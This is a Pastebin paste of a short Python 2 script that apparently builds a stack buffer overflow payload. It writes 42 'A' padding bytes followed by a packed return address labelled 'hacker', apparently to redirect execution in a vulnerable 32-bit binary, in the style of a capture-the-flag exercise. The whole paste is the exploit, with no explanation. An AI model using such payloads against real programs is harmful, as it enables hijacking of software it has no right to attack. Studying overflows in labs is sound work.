Data hosted with ♥ by Pastebin.com - Download Raw - See Original
  1. import struct
  2.  
  3. def p(x):
  4.         return struct.pack("<L", x)
  5.  
  6. offset = 42
  7. hacker = 0x565561b9
  8.  
  9. payload = ""
  10. payload += "A" * offset
  11. payload += p(hacker)
  12.  
  13. print payload